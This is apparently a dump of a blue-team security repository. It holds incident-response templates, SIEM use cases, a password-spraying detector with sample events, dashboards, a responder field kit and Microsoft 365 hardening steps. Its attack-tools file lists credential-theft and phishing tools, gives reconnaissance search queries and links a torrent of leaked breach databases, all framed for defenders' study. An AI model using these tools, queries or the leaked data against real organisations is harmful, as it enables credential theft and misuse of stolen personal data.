the proper course of action/response. Include steps to validate true or false positive and whether Containment, Remediation, and Recovery steps are necessary. 
List specific monitors, dashboards, reports, automated emails, alerts, etc. In cases where a user may provide the initial notification, provide language to look for. e.g.: 29 | - A call from a user referencing a Symantec Antivirus popup or window. 30 | - An email from a System Administrator citing an antivirus alert in Symantec Manager.] 31 | 32 | ## Recommended Response Action(s) 33 | 34 | ### Identification 35 | [Provide recommended actions that determine investigation scope, collect and preserve data, and perform technical analysis, and state when, where, and to whom to escalate.] 36 | 37 | ### Containment 38 | [Provide recommended actions that limit the impact and spread of the situation.] 39 | 40 | ### Eradication & Recovery 41 | [Provide steps to determine whether a system can be restored after cleanup versus requiring reimaging, disk replacement, or entire system replacement. Provide recommended actions to eradicate all artifacts and revert all changes to the system when viable, including how to validate the actions taken.] 42 | 43 | # References and Resources 44 | [Provide any useful resources or references that can help understand the vulnerability, attack, detection, affected software, protocols, etc. Usually in the form of URLs with page names (in case the website owner restructures their links, as Microsoft often does).] 45 | 46 | 47 | 48 | 49 | References (for this template) 50 | - Don Murdoch's Blue Team Handbook (2018) 51 | - https://www.cisa.gov/sites/default/files/2024-08/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf 52 | - https://github.com/socfortress/Playbooks/blob/main/IRP-TEMPLATE.md -------------------------------------------------------------------------------- /Use-Cases.md: -------------------------------------------------------------------------------- 1 | Signatures should be mapped to use cases based on a grouping that makes sense. This mapping allows the investigator to review recommended response actions. 
A good start would be using MITRE ATT&CK framework Tactics as Use Cases for signatures. 2 | 3 | These less-technical use cases should also be considered for addition into your use case library: 4 | - The mouse and/or keyboard start moving/typing on their own. (https://attack.mitre.org/techniques/T1021/) 5 | - A device performs unexpected functions on its own (like a gate opening or closing unexpectedly). 6 | - An endpoint computer fails to boot up properly. 7 | - A ransomware message is displayed. (https://attack.mitre.org/techniques/T1486/) 8 | - A caller claims to be the helpdesk or other member of IT Staff. (https://attack.mitre.org/techniques/T1656) 9 | - An unidentified peripheral (like a USB) is found connected to a system. (https://attack.mitre.org/techniques/T1091/) 10 | - An email or document suggests calling a provided phone number for support (e.g. Microsoft). (https://attack.mitre.org/techniques/T1566/) 11 | - Historic events are seemingly deleted or otherwise no longer available. (https://attack.mitre.org/techniques/T1070/) 12 | - Unauthorized changes appear to have been made to a device's logic code/configuration. (https://attack.mitre.org/techniques/T0845/) 13 | - A secure location shows clear signs of breaking and entering. 14 | - An unauthorized person is found in a location. 15 | - An antivirus/antimalware product presents a detection alert. 16 | -------------------------------------------------------------------------------- /UseCases/Detect-Password-Spraying-via-Windows-Events.md: -------------------------------------------------------------------------------- 1 | # Executive Summary 2 | 3 | Adversaries may attempt to creatively brute force many accounts on a network by increasing the time between logon attempts, preventing automatic account locking. Since waiting more time impacts speed of the attack, adversaries typically target more than one account simultaneously. 
4 | 5 | ## Name 6 | 7 | Detect Password Spraying via Windows Events 8 | 9 | 10 | ## Problem Statement 11 | 12 | Password spraying targets the human tendency to both use weak passwords and reuse them. Adversaries attempt to avoid brute force detection and prevention by increasing the time between password attempts. To account for the significant reduction in the speed of the attack, multiple accounts are targeted in parallel. Each of these parallel attacks is progressed slowly enough to keep the account from reaching the failed-attempts lockout threshold. 13 | 14 | 15 | ## Objectives 16 | 17 | - Detect the low and slow brute force method known as password spraying. 18 | 19 | 20 | ## Compliance 21 | 22 | . 23 | 24 | 25 | ## Mitre ATT&CK Framework 26 | 27 | - Credential Access https://attack.mitre.org/tactics/TA0006/ 28 | - Brute Force https://attack.mitre.org/techniques/T1110/ (sub-technique Password Spraying, https://attack.mitre.org/techniques/T1110/003/) 29 | 30 | 31 | ## Assumptions and Limitations 32 | 33 | - Failed logons must be collected from every system that authenticates the targeted accounts: for domain accounts that is the domain controllers, where Kerberos and NTLM failures appear as Event IDs 4771 and 4776 rather than 4625. A spray against a single member server, or against a cloud identity provider, is invisible to a domain-controller-only feed. 34 | 35 | 36 | # Analysis 37 | 38 | Password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logons are attempted with that password against many different accounts on the network, which avoids the account lockouts that would normally occur when brute forcing a single account with many passwords. 39 | 40 | 41 | ## Monitoring and Notifications 42 | 43 | . 44 | 45 | 46 | ## Recommended Response Action(s) 47 | 48 | - Determine source and destination account/systems 49 | - Collect and analyze surrounding events 50 | - Issue password change requirement to account owner(s) 51 | - Determine if source/destination accounts/systems are compromised 52 | - Consider quarantining, isolating, or disabling compromised accounts/systems 53 | 54 | 55 | # Engineering 56 | 57 | . 
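The detection logic for the Engineering section, as an added Python example that is not code from this repository: it groups constructed Event ID 4625 records by source IP and flags sources that failed against many distinct accounts inside a window while staying under the lockout threshold on each one. The field names follow the 4625 event XML (`IpAddress`, `TargetUserName`, `SubStatus`); the one-hour window, the five-account minimum and the lockout threshold of five are assumed values.

```python
"""Added example (not from this repository): password-spray detection over
constructed Windows Security Event ID 4625 records. Field names follow the
4625 event XML; window, account count and lockout threshold are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values that mean a credential was actually tested.
BAD_PASSWORD = "0xC000006A"   # user name correct, password wrong
NO_SUCH_USER = "0xC0000064"   # user name does not exist (enumeration by the sprayer)


def _at(hhmm):
    """Constructed timestamp on a fixed day."""
    return datetime(2024, 1, 15, int(hhmm[:2]), int(hhmm[3:]))


def failed_logon(hhmm, ip, user, sub_status=BAD_PASSWORD):
    """A simplified 4625 record with only the fields the detection needs."""
    return {"EventID": 4625, "TimeCreated": _at(hhmm), "IpAddress": ip,
            "TargetUserName": user, "SubStatus": sub_status, "LogonType": 3}


ACCOUNTS = ["alice", "bob", "carol", "dave", "erin",
            "frank", "grace", "heidi", "ivan", "judy"]

# Constructed event stream: one sprayer, one single-account brute force, one typo.
SAMPLE_EVENTS = (
    # 10.0.0.5 tries one password per account, one account every 4 minutes: a spray.
    [failed_logon(f"09:{m:02d}", "10.0.0.5", u) for m, u in zip(range(0, 40, 4), ACCOUNTS)]
    # 10.0.0.9 hammers a single account: a brute force, which is a different rule.
    + [failed_logon(f"09:{m:02d}", "10.0.0.9", "admin") for m in range(20)]
    # 10.0.0.7 is a user who mistyped a password once.
    + [failed_logon("09:05", "10.0.0.7", "mallory")]
    # The sprayer also guesses an account name that does not exist.
    + [failed_logon("09:41", "10.0.0.5", "printer-svc", NO_SUCH_USER)]
)


def detect_spraying(events, window=timedelta(hours=1), min_accounts=5, lockout_threshold=5):
    """Map source IP -> sorted target accounts for every source that failed against
    at least min_accounts distinct accounts inside window while staying below
    lockout_threshold failures on each one (the low-and-slow pattern)."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e["SubStatus"] in (BAD_PASSWORD, NO_SUCH_USER):
            by_src[e["IpAddress"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, start in enumerate(evs):          # slide a window over the sorted failures
            per_user = defaultdict(int)
            for e in evs[i:]:
                if e["TimeCreated"] - start["TimeCreated"] > window:
                    break
                per_user[e["TargetUserName"]] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) < lockout_threshold:
                alerts[src] = sorted(per_user)
                break
    return alerts


if __name__ == "__main__":
    for src, users in detect_spraying(SAMPLE_EVENTS).items():
        print(f"{src}: {len(users)} accounts targeted: {', '.join(users)}")
```

A NAT gateway, VPN concentrator or terminal-server farm collapses many real users onto one `IpAddress`, so tune `min_accounts` per source type and add `WorkstationName` to the grouping where it is populated. Counting `NO_SUCH_USER` failures alongside bad passwords matters because sprayers often work from a guessed or scraped user list, and the non-existent names are the loudest part of the run.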
58 | 59 | 60 | ## Component Names 61 | 62 | 63 | 64 | ## Data Stream Analysis 65 | 66 | - Windows Security Event ID 4624 67 | - Windows Security Event ID 4625 (for domain accounts also collect 4771, Kerberos pre-authentication failed, and 4776, NTLM credential validation, from the domain controllers) 68 | - Windows Security Event ID 4648 69 | 70 | 71 | ## Assurance Metrics 72 | 73 | . -------------------------------------------------------------------------------- /UseCases/Layer3-Firewall.md: -------------------------------------------------------------------------------- 1 | TODO: Merge into Tactics md's 2 | 3 | SIEM Use Cases based on Layer 3 Firewalls 4 | - [Traffic from Printers to Servers/Workstations](#traffic-from-printers-to-serversworkstations) 5 | - [Traffic from Servers to Workstations](#traffic-from-servers-to-workstations) 6 | - [Traffic from Workstations to Workstations](#traffic-from-workstations-to-workstations) 7 | - [Unauthorized Egress DNS Traffic](#unauthorized-egress-dns-traffic) 8 | - [Unauthorized Egress NTP Traffic](#unauthorized-egress-ntp-traffic) 9 | - [OS Update Requests to Non-Company Servers](#os-update-requests-to-non-company-servers) 10 | - [Newly Observed Port Use](#newly-observed-port-use) 11 | - [Known-bad Port Observed](#known-bad-port-observed) 12 | - [Known-bad IP Address Observed](#known-bad-ip-address-observed) 13 | - [Newly observed UDP Traffic](#newly-observed-udp-traffic) 14 | - [Spike in Outbound Denies](#spike-in-outbound-denies) 15 | - [Spike in Egress Sessions](#spike-in-egress-sessions) 16 | - [Anomalous Upload/Download Ratio](#anomalous-uploaddownload-ratio) 17 | - [Unauthorized Egress Email Traffic](#unauthorized-egress-email-traffic) 18 | - [Unauthorized Egress Web Requests](#unauthorized-egress-web-requests) 19 | - [Border Firewall Egress Default Deny Blocks](#border-firewall-egress-default-deny-blocks) 20 | 21 | # Traffic from Printers to Servers/Workstations 22 | - Blacklist Alert 23 | 24 | 25 | # Traffic from Servers to Workstations 26 | - Blacklist Alert 27 | 28 | 29 | # Traffic from Workstations to Workstations 30 | - Rolling Whitelist Alert 31 | 
32 | 33 | # Unauthorized Egress DNS Traffic 34 | - Blacklist Alert 35 | - Port 53 36 | - Could indicate DNS Tunneling 37 | 38 | 39 | # Unauthorized Egress NTP Traffic 40 | - Blacklist Alert 41 | - Port 123 42 | 43 | 44 | # OS Update Requests to Non-Company Servers 45 | - Blacklist Alert 46 | - Accessing default Windows, Ubuntu, etc update IP addresses could indicate a rogue device 47 | 48 | 49 | # Newly Observed Port Use 50 | - Rolling Whitelist Alert 51 | - Ideally separate system types into different rolling whitelists (printers, servers, workstations) 52 | 53 | 54 | # Known-bad Port Observed 55 | - Blacklist Alert 56 | 57 | 58 | # Known-bad IP Address Observed 59 | - Blacklist Alert 60 | 61 | 62 | # Newly observed UDP Traffic 63 | - Rolling Whitelist Alert 64 | 65 | 66 | # Spike in Outbound Denies 67 | - Threshold Alert 68 | 69 | 70 | # Spike in Egress Sessions 71 | - Threshold Alert 72 | 73 | 74 | # Anomalous Upload/Download Ratio 75 | - Threshold Alert 76 | 77 | 78 | # Unauthorized Egress Email Traffic 79 | - Blacklist Alert 80 | - Ports include 25, 143, 587, 110, etc 81 | 82 | # Unauthorized Egress Web Requests 83 | - Not originating from company proxy 84 | - Blacklist 85 | 86 | 87 | # Border Firewall Egress Default Deny Blocks 88 | - Rolling Whitelist Alert 89 | 90 | -------------------------------------------------------------------------------- /UseCases/Layer7-Firewall.md: -------------------------------------------------------------------------------- 1 | TODO: Merge into Tactics md's 2 | 3 | SIEM Use Cases for Layer 7 Firewalls. Note that Layer 3 Firewall use cases also apply here. 
4 | 5 | - [Abnormal Expired Certificates](#abnormal-expired-certificates) 6 | - [Abnormal Self-Signed Certificates](#abnormal-self-signed-certificates) 7 | - [Abnormal certificate Algorithms/Sizes](#abnormal-certificate-algorithmssizes) 8 | - [Abnormal Certificates Validity Length](#abnormal-certificates-validity-length) 9 | - [Certificates with Abnormal Common Name Fields](#certificates-with-abnormal-common-name-fields) 10 | - [Certificates with Blank Fields that are Commonly Filled](#certificates-with-blank-fields-that-are-commonly-filled) 11 | - [Certificates with Invalid Country Codes / States](#certificates-with-invalid-country-codes--states) 12 | - [Newly-observed Protocol in Use](#newly-observed-protocol-in-use) 13 | - [Protocol Use Over Non-Standard Port](#protocol-use-over-non-standard-port) 14 | - [Web requests Directly to IP Address](#web-requests-directly-to-ip-address) 15 | - [Newly Observed File Transfer Protocol Use](#newly-observed-file-transfer-protocol-use) 16 | - [Unauthorized X-Forwarded-For Address](#unauthorized-x-forwarded-for-address) 17 | 18 | # Abnormal Expired Certificates 19 | - Aggregate Count 20 | 21 | 22 | # Abnormal Self-Signed Certificates 23 | - Aggregate Count 24 | 25 | 26 | # Abnormal certificate Algorithms/Sizes 27 | - Aggregate Count 28 | 29 | 30 | # Abnormal Certificates Validity Length 31 | - Blacklist Alert 32 | - Suggest looking for a validity period of 5 years or longer (publicly trusted certificates have been capped at 398 days since September 2020, so anything longer is private PKI or self-issued) 33 | 34 | 35 | # Certificates with Abnormal Common Name Fields 36 | - Blacklist Alert 37 | 38 | 39 | # Certificates with Blank Fields that are Commonly Filled 40 | - Blacklist Alert 41 | 42 | 43 | # Certificates with Invalid Country Codes / States 44 | - Blacklist Alert 45 | 46 | 47 | # Newly-observed Protocol in Use 48 | - Rolling Whitelist 49 | 50 | 51 | # Protocol Use Over Non-Standard Port 52 | - Blacklist 53 | 54 | 55 | # Web requests Directly to IP Address 56 | - Blacklist Alert 57 | - AKA Naked IP 58 | 59 | 60 | # Newly Observed File Transfer Protocol Use 61 | - Rolling 
Whitelist Alert 62 | - FTP, TFTP, SSH (SCP/SFTP), etc 63 | 64 | # Unauthorized X-Forwarded-For Address 65 | - X-Forwarded-For carries the original client IP as inserted by an upstream proxy; alert on values that did not come from a known proxy, bearing in mind that a client can set the header itself, so it must never be trusted for access decisions 66 | - Blacklist -------------------------------------------------------------------------------- /attack-tools-resources.md: -------------------------------------------------------------------------------- 1 | - [Common Tools Used by Adversaries](#common-tools-used-by-adversaries) 2 | - [Discovery (Passive)](#discovery-passive) 3 | - [Google Dorking](#google-dorking) 4 | - [Breach Databases](#breach-databases) 5 | - [Discovery (Active)](#discovery-active) 6 | - [Credential Access](#credential-access) 7 | - [Attack Demonstrations](#attack-demonstrations) 8 | - [Open Source Attacker Simulation Tools](#open-source-attacker-simulation-tools) 9 | 10 | # Common Tools Used by Adversaries 11 | 12 | Study these tools to find new ways to discover and defend against them. 13 | 14 | - TokenPlayer - https://github.com/S1ckB0y1337/TokenPlayer 15 | - crackmapexec - https://github.com/byt3bl33d3r/CrackMapExec 16 | - impacket - https://github.com/SecureAuthCorp/impacket 17 | - Especially secretsdump.py 18 | - Basically anything in Kali Linux - https://www.kali.org/ 19 | - pingcastle - https://github.com/vletoux/pingcastle 20 | - mimikatz - https://github.com/gentilkiwi/mimikatz * 21 | - Kerberoast - https://github.com/nidem/kerberoast * 22 | - hashcat - https://github.com/hashcat/hashcat 23 | - Burp Suite - https://portswigger.net/burp/communitydownload 24 | - Request Smuggler plugin 25 | - openvas - https://github.com/greenbone/openvas 26 | - autossh - www.harding.motd.ca/autossh/ 27 | - dirb - http://dirb.sourceforge.net/ 28 | - evilginx2 - https://github.com/kgretzky/evilginx2 29 | - chashell - https://github.com/sysdream/chashell 30 | - Exchange Web Services (EWS) Crack - https://github.com/mikesiegel/ews-crack 31 | - Okta Password Sprayer - https://github.com/Rhynorater/Okta-Password-Sprayer 32 | - CQHashDumpV2 - 
https://cqureacademy.com/blog/identity-theft-protection/pass-hash-attack-tutorial 33 | - Rubeus - https://github.com/GhostPack/Rubeus 34 | - Seatbelt - https://github.com/ghostpack/seatbelt 35 | - evilClippy - https://github.com/outflanknl/EvilClippy 36 | - proxychains - https://github.com/haad/proxychains 37 | 38 | ## Discovery (Passive) 39 | Stuff you probably won't see on your network, but could use "against yourself" 40 | - hardcidr - https://github.com/trustedsec/hardcidr 41 | - amass - https://github.com/caffix/amass 42 | - PowerMeta - https://github.com/dafthack/PowerMeta 43 | - truffleHog - https://github.com/dxa4481/truffleHog 44 | - reposcanner - https://github.com/Dionach/reposcanner 45 | 46 | ### Google Dorking 47 | - yourdomain.com (site:amazonaws.com | site:blob.core.windows.net | site:digitaloceanspaces.com) 48 | - yourdomain.com (site:pastebin.com | site:paste2.org | site:paste.bradleygill.com | site:pastie.org | site:dpaste.org) 49 | - "your company" site:linkedin.com (intitle:"Service Desk" | intitle:"Desktop Support" | intitle:"Security Engineer" | intitle:"Help Desk") 50 | 51 | ### Breach Databases 52 | - https://thepiratebay.org/torrent/22590240/Leaked_Databases 53 | 54 | ## Discovery (Active) 55 | You might see some of this 56 | - aquatone - https://github.com/michenriksen/aquatone 57 | - dirsearch - https://github.com/maurosoria/dirsearch 58 | - nmap - https://nmap.org/ 59 | - bloodhound - https://github.com/BloodHoundAD/BloodHound 60 | 61 | ## Credential Access 62 | - CleverSpray - https://github.com/wavestone-cdt/Invoke-CleverSpray 63 | 64 | # Attack Demonstrations 65 | - Netwrix Attack Catalog https://www.netwrix.com/attack.html 66 | 67 | # Open Source Attacker Simulation Tools 68 | 69 | - Atomic Red Team 70 | - https://github.com/redcanaryco/atomic-red-team 71 | - Mordor 72 | - https://github.com/hunters-forge/mordor 73 | - EVTX Attack Samples 74 | - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES 75 | - Caldera 76 | - 
https://github.com/mitre/caldera 77 | - Metta 78 | - https://github.com/uber-common/metta 79 | - APT Simulator 80 | - https://github.com/NextronSystems/APTSimulator 81 | - Red Team Automation 82 | - https://github.com/endgameinc/RTA 83 | - Infection Monkey 84 | - https://github.com/guardicore/monkey 85 | - Blue Team Training Toolkit (BT3) 86 | - https://www.encripto.no/en/downloads-2/tools/ 87 | - DumpsterFire 88 | - https://github.com/TryCatchHCF/DumpsterFire 89 | - AutoTTP 90 | - https://github.com/jymcheong/AutoTTP 91 | - NSA Unfetter 92 | - https://mitre.github.io/unfetter/ 93 | - MATE MITRE ATT&CK Technique Emulation 94 | - https://github.com/fugawi/mate 95 | - Purple Team ATT&CK Automation 96 | - https://github.com/praetorian-inc/purple-team-attack-automation 97 | 98 | 99 | * - Implementation attack, unlikely to be patched traditionally. -------------------------------------------------------------------------------- /dashboards.md: -------------------------------------------------------------------------------- 1 | These dashboard/widget suggestions are high level, meant to be used to get off on the right foot and to inspire further development. 2 | 3 | ## Long Tail Analysis 4 | - All should be displayed as count of aggregated events in a bar charts. 5 | - Generally, the purpose is to identify unique occurrences in a data set visually, by inspecting the "Long Tail" of unique events. 6 | - The most interesting events here are the unique items at the end of the chart, but sometimes can be the largest items at the beginning. 
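The Stack Counting, Grouping and Standard deviation techniques from Threat-Hunting.md and the Long Tail Analysis described above, as an added Python example that is not part of this repository. The process-creation and firewall-deny records are constructed; the z-score cutoff of 2 and the MAD cutoff of 3.5 are assumed values.

```python
"""Added example (not from this repository): stack counting (long-tail analysis),
grouping and standard-deviation outliers over constructed event records."""
from collections import Counter
import statistics

# Constructed 4688-style process creation records as (hostname, process name).
PROCESS_EVENTS = (
    [("ws01", "chrome.exe")] * 40 + [("ws02", "chrome.exe")] * 35 + [("ws03", "chrome.exe")] * 30
    + [("ws01", "outlook.exe")] * 20 + [("ws02", "outlook.exe")] * 22
    + [("ws03", "teams.exe")] * 12
    + [("ws03", "svchosts.exe")]      # one-off lookalike of a system binary name
    + [("ws02", "pwdump7.exe")]       # one-off credential dumping tool
)

# Constructed outbound firewall deny counts per host for the last hour.
OUTBOUND_DENIES = {"ws01": 3, "ws02": 5, "ws03": 4, "ws04": 2, "ws05": 6,
                   "ws06": 3, "ws07": 4, "ws08": 90, "ws09": 5, "ws10": 3}


def stack_count(events, field_index):
    """(value, count) pairs for one field, most common first; the long tail is at the end."""
    return Counter(e[field_index] for e in events).most_common()


def long_tail(stacked, max_count=1):
    """Values seen at most max_count times: the rows a hunter reviews first."""
    return [value for value, n in stacked if n <= max_count]


def hosts_per_value(events):
    """Group by host, then count hosts per process: a process on one of many hosts
    is rare even when its raw event count is not."""
    hosts = {}
    for host, value in events:
        hosts.setdefault(value, set()).add(host)
    return {value: len(h) for value, h in hosts.items()}


def stdev_outliers(counts, z_threshold=2.0):
    """Keys more than z_threshold population standard deviations above the mean.
    One large spike inflates the stdev itself: with n values a z-score cannot
    exceed sqrt(n-1), so a 2.0 cutoff only works for n of about 6 or more."""
    values = list(counts.values())
    mean, sd = statistics.mean(values), statistics.pstdev(values)
    if sd == 0:
        return []
    return [k for k, v in counts.items() if (v - mean) / sd > z_threshold]


def mad_outliers(counts, cutoff=3.5):
    """Robust alternative using the median absolute deviation, which the spike
    does not inflate; 0.6745 scales MAD to a normal-distribution sigma."""
    values = list(counts.values())
    med = statistics.median(values)
    mad = statistics.median(abs(v - med) for v in values)
    if mad == 0:
        return []
    return [k for k, v in counts.items() if 0.6745 * (v - med) / mad > cutoff]


if __name__ == "__main__":
    stacked = stack_count(PROCESS_EVENTS, 1)
    print("long tail:", long_tail(stacked))
    print("hosts per process:", hosts_per_value(PROCESS_EVENTS))
    print("deny spikes (z-score):", stdev_outliers(OUTBOUND_DENIES))
    print("deny spikes (MAD):", mad_outliers(OUTBOUND_DENIES))
```

The two outlier functions illustrate the caveat behind any "spike" threshold alert: with ten hosts and one of them at 90 denies, the z-score lands at 3.0, which is the largest value ten samples can produce, so a cutoff of 3 would silently never fire. The MAD variant is the one to use for small per-group baselines.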
7 | 8 | | Data Source | Filters | Aggregated Columns | 9 | | ---------------------- | -------------------------------------------- | -------------------------------- | 10 | | Host-Based IPS | | Threat Source Process Name | 11 | | Host-Based IPS | | Detecting Hostname | 12 | | Host-Based IPS | | Threat Source Username | 13 | | Data Loss Protection | | Destination/Device Type | 14 | | Rogue System Detection | | Hostname | 15 | | Virus Engine | | Alert Name | 16 | | Virus Engine | | Process Name | 17 | | Firewall | Outbound connections on uncommon ports | Destination IP, destination port | 18 | | Web Proxy | Web Traffic | Destination Domain | 19 | | Firewall | Outbound SMTP traffic NOT from Mail gateways | Destination, Port | 20 | | Firewall | Inbound Blocks | Source, Destination, Port | 21 | | Firewall | Outbound Blocks | Source, Destination, Port | 22 | | Windows Event Logs | Non-Interactive logon on User accounts | Username | 23 | | Windows Event Logs | Interactive Logon on Privileged Accounts | Username | 24 | | Windows Event Logs | Interactive logon on Service accounts | Username | 25 | | Web Proxy | Interaction with IP addresses (not a domain) | Full URL | 26 | | Network Appliances | Change-notification on Cisco devices | Username | 27 | | Web Server | Web Request 200, 404 | Requested Address | 28 | | Windows Event Logs | Service or Scheduled Task Creation | Service or Task Name, Filepath | 29 | 30 | -------------------------------------------------------------------------------- /field-kit.md: -------------------------------------------------------------------------------- 1 | (AKA incident response kit, bugout bag, flyaway kit, go bag, deployment kit, jump bag, rapid response kit) 2 | 3 | Individual Kit 4 | - Any necessary Personal Protective Equipment (PPE) 5 | - Notetaking materials 6 | - Audio recording capability 7 | - Photography capability 8 | - Analysis laptop (with authorized, preinstalled, and tested forensic tools and playbooks per Incident Response 
Plan) 9 | 10 | Team Kit 11 | - Kit should be in one or more containers with wheels. 12 | - Flashlight (headlamp style) 13 | - Spare batteries or rechargeable 14 | - Multitool 15 | - Electronics Components 16 | - Electronics screwdriver set 17 | - Antistatic protection wrist strap and pad 18 | - Electronics Vacuum (antistatic) 19 | - Digital multimeter 20 | - Power Components 21 | - 2x USB-A Chargers (3amps+) 22 | - 2x 20ft+ extension cords 23 | - 2x power strips (with surge protection) 24 | - Wiring Components 25 | - Universal USB Conversion Kit 26 | - USB Micro to USB A Wire 27 | - USB C to USB A Wire 28 | - USB-A Extension Wire 29 | - USB Hub (with external power) 30 | - USB to Ethernet adapter 31 | - USB to Serial adapter 32 | - Networking Components 33 | - Ethernet cable 34 | - Ethernet crossover adapter or cable 35 | - 5+ port managed switch (with port spanning/mirroring) 36 | - 5 port hub (unmanaged) 37 | - Ethernet cable testers / Wire Tracker kit 38 | - Ethernet cable crimper 39 | - RJ-45 connectors 40 | - Forensics Components 41 | - Digital evidence bags and tags 42 | - Chain of custody forms as specified by Incident Response Plan 43 | - USB 3.1 Write Blocker 44 | - Drive Components 45 | - 2x External hard drives (5 TB+ storage, USB-3.0+, hardware-encryption compatible) 46 | - 2x External "thumbsticks" (1TB+ storage, USB 3.0+) 47 | - 2x SATA to External USB Adapter/Enclosure/Dock (USB 3.0+) 48 | - 2x IDE to External USB Adapter/Enclosure/Dock (USB 3.0+) 49 | - 2x NVMe to USB Adapter/Enclosure/Dock (USB 3.0+) 50 | - External DVD-R Drive 51 | - Blank DVD-Rs 52 | - Server Room Components 53 | - StarTech.com USB Crash Cart Adapter 54 | - 2x Foldable Stools (with back rest) 55 | - Long-haul Components 56 | - Emergency Food Supply (non-perishable meals, long shelf life) 57 | - 2+ tableware sets (spoon, fork, knife, bowl, cup, plate) 58 | - Water boiler 59 | -------------------------------------------------------------------------------- /hardening/dns-security.md: 
-------------------------------------------------------------------------------- 1 | - Regularly review DNS records for proper resolution, or build signatures to detect unexpected changes. 2 | - Use Multifactor Authentication for all accounts that can make changes to DNS records 3 | - Monitor certificate transparency logs for newly added certificates covering your domains, or build signatures to detect them. 4 | -------------------------------------------------------------------------------- /hardening/email-security.md: -------------------------------------------------------------------------------- 1 | # Utilize Spam/Phish Filtering 2 | Enable strong spam filters to prevent phishing emails from reaching end users. 3 | 4 | # User Training 5 | Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments. 6 | 7 | # Attachment Filtering 8 | Filter emails containing executable files to prevent them from reaching end users. -------------------------------------------------------------------------------- /hardening/general-security.md: -------------------------------------------------------------------------------- 1 | # Apply defense-in-depth principles 2 | Use multiple layers of security so that analysis and detection of a possible intrusion does not depend on any single control. 
3 | 4 | # Resources 5 | - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a -------------------------------------------------------------------------------- /hardening/microsoft-365-auditing-and-reporting.md: -------------------------------------------------------------------------------- 1 | - [Enable Audit Log Search](#enable-audit-log-search) 2 | - [Enable Mailbox Auditing for All Users](#enable-mailbox-auditing-for-all-users) 3 | - [Review Role Changes Weekly](#review-role-changes-weekly) 4 | - [Review Mailbox Forwarding Rules Weekly](#review-mailbox-forwarding-rules-weekly) 5 | - [Review the Mailbox Access by Non-Owners Report Bi-Weekly](#review-the-mailbox-access-by-non-owners-report-bi-weekly) 6 | - [Review the Malware Detections Report Weekly](#review-the-malware-detections-report-weekly) 7 | - [Review your Account Provisioning Activity Report Weekly](#review-your-account-provisioning-activity-report-weekly) 8 | - [Additional Resources](#additional-resources) 9 | 10 | # Enable Audit Log Search 11 | 12 | # Enable Mailbox Auditing for All Users 13 | 14 | # Review Role Changes Weekly 15 | 16 | # Review Mailbox Forwarding Rules Weekly 17 | 18 | # Review the Mailbox Access by Non-Owners Report Bi-Weekly 19 | 20 | # Review the Malware Detections Report Weekly 21 | 22 | # Review your Account Provisioning Activity Report Weekly 23 | 24 | 25 | # Additional Resources 26 | - https://usc.pax8.com/resource/display/33588 27 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 28 | -------------------------------------------------------------------------------- /hardening/microsoft-365-azure-ad.md: -------------------------------------------------------------------------------- 1 | - [Enable MFA](#enable-mfa) 2 | - [Enable MFA For Just Admins](#enable-mfa-for-just-admins) 3 | - [Block Legacy Authentication](#block-legacy-authentication) 4 | - [Enable Self-Service 
Password Reset](#enable-self-service-password-reset) 5 | - [Do Not Expire Passwords](#do-not-expire-passwords) 6 | - [Delete/block accounts not used in last 30 days](#deleteblock-accounts-not-used-in-last-30-days) 7 | - [Designate More than 1 Global Admin but fewer than 5](#designate-more-than-1-global-admin-but-fewer-than-5) 8 | - [Do not allow users to grant consent to unmanaged applications](#do-not-allow-users-to-grant-consent-to-unmanaged-applications) 9 | - [Additional Resources](#additional-resources) 10 | 11 | # Enable MFA 12 | 13 | Security defaults make it easier to help protect your organization from common identity attacks such as password spray, replay and phishing with preconfigured security settings: 14 | - Requiring all users to register for Azure AD Multi-Factor Authentication. 15 | - Requiring administrators to perform multi-factor authentication. 16 | - Blocking legacy authentication protocols. 17 | - Requiring users to perform multi-factor authentication when necessary. 18 | - Protecting privileged activities like access to the Azure portal. 19 | 20 | Compliance Controls: 21 | - CSA CCM301; Control DSI-02 22 | - FedRAMP Moderate; Control IA-3 23 | - GDPR; Control 6.6.5 24 | - ISO 27018:2014; Control C.9.4.2, Control A.10.8 25 | - NIST 800-171; Control 3.5.2 26 | - NIST 800-53; Control IA-3 27 | 28 | To enable security defaults in your directory: 29 | - Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator. 30 | - Browse to Azure Active Directory > Properties. 31 | - Select Manage security defaults. 32 | - Set the Enable security defaults toggle to Yes. 33 | - Select Save. 34 | 35 | ## Enable MFA For Just Admins 36 | To create an MFA conditional access policy in your directory for admins (Conditional Access requires an Azure AD Premium P1 license and cannot be used while security defaults are enabled): 37 | - Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator. 38 | - Browse to Azure Active Directory > Security. 
- Browse to Protect > Conditional Access.
- Click New Policy.
- Give the policy a name and, under the Users and groups blade, select Directory Roles. From the drop-down, select Global Administrator at a minimum. Add other privileged roles like User Administrator or Security Administrator.
- Select All Cloud Apps.
- Skip the Conditions section and, in the Grant section, select Require Multi-factor Authentication.
- Enable the policy and click Create.

# Block Legacy Authentication
Legacy authentication is more susceptible to password spray or brute force attacks because you cannot layer MFA on top of it. It is advised to block all legacy authentication methods. Note that if you have any printers/copiers/scanners or IMAP accounts used for ticketing, you should update those protocols before blocking legacy auth.

To block legacy authentication via security defaults in your directory:
- Ensure Security Defaults are enabled (see above).
- Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator.
- Browse to Azure Active Directory > Security.
- Browse to Protect > Conditional Access.
- Click New Policy.
- Name your policy and scope it to all users.
- In the Cloud apps or actions blade, click All cloud apps.
  - *NOTE* If you do have applications that use legacy auth, you could exclude them here to give yourself more time to update the protocol.
- In the Conditions section, click Client Apps > Mobile Apps and Desktop Clients > Other Clients.
- In the Grant blade, leave the setting at Block Access.
- Enable the policy and click Create.

# Enable Self-Service Password Reset
